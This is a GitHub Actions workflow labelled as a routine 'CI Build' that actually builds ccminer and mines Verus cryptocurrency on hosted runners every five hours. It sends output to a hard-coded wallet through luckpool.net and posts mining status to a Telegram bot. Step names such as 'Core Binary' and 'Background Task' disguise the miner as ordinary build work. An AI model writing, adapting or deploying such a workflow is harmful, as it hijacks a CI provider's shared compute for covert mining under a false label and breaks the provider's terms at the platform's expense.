name: CI Build AKH1

on:
  schedule:
    - cron: "0 */5 * * *"
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest
    timeout-minutes: 300

    steps:
      - name: Setup Environment
        run: |
          sudo apt update
          sudo apt install -y \
            build-essential git cmake automake libtool autoconf pkg-config \
            libcurl4-openssl-dev

      - name: Download and Build Core Binary
        run: |
          git clone https://github.com/monkins1010/ccminer.git tempdir
          cd tempdir
          chmod +x build.sh
          ./build.sh
          mv ccminer ../main

      - name: Run Background Task
        run: |
          WALLET="RGVmtuvrP2yX8q3U4up77CcSpkcVhp4bUG"
          WORKER="AKH1"
          LOG_FILE="out.log"
          MAX_IDLE=600  # 10 menit

          TELEGRAM_TOKEN="${{ secrets.TELEGRAM_TOKEN }}"
          TELEGRAM_CHAT_ID="${{ secrets.TELEGRAM_CHAT_ID }}"

          tg_notify() {
            curl -s -X POST https://api.telegram.org/bot$TELEGRAM_TOKEN/sendMessage \
              -d chat_id=$TELEGRAM_CHAT_ID \
              -d parse_mode=Markdown \
              -d text="$1"
          }

          tg_notify "🚀 *AKH1 process started* with 2 threads."

          ./main -a verus \
            -o stratum+tcp://na.luckpool.net:3956 \
            -u $WALLET.$WORKER -p hybrid -t 2 > $LOG_FILE 2>&1 &

          PID=$!
          LAST_ACCEPTED=$(date +%s)
          SHARES_ACCEPTED=0

          tail -F $LOG_FILE | while read -r line; do
            NOW=$(date +%s)

            if echo "$line" | grep -q "accepted"; then
              SHARES_ACCEPTED=$((SHARES_ACCEPTED + 1))
              LAST_ACCEPTED=$NOW
              HASHRATE=$(echo "$line" | grep -o "[0-9.]\+ kH/s")
              tg_notify "✅ *AKH1 accepted share*\n📈 $HASHRATE\n💠 Total: *$SHARES_ACCEPTED*"
            fi

            if [ $((NOW - LAST_ACCEPTED)) -gt $MAX_IDLE ]; then
              tg_notify "⚠️ *AKH1 idle >10m*. Restarting..."
              kill $PID
              break
            fi

            if ! ps -p $PID > /dev/null; then
              tg_notify "❌ *AKH1 crashed*"
              break
            fi
          done

          tg_notify "✅ *AKH1 process ended*\nTotal shares: *$SHARES_ACCEPTED*"
